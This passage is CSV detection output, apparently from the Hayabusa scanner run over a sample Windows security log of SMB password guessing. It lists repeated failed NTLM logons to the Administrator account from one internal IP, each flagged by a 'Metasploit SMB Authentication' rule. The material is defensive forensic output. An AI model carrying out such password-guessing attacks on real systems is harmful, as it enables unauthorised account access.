Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 